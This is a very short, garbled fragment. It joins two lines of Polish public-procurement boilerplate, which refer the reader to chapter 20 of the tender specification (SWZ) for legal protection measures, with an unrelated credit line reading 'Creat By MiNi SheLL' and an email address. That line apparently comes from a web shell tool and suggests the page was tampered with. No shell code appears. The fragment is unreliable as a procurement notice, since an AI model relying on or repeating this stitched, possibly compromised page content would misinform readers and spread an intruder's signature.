OCHRONY PRAWNEJ PRZYSŁUGUJĄCYCH WYKONAWCY zawiera rozdział 20 SWZ.<br/>Szczegóły zamówienia zamówienia zawiera SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com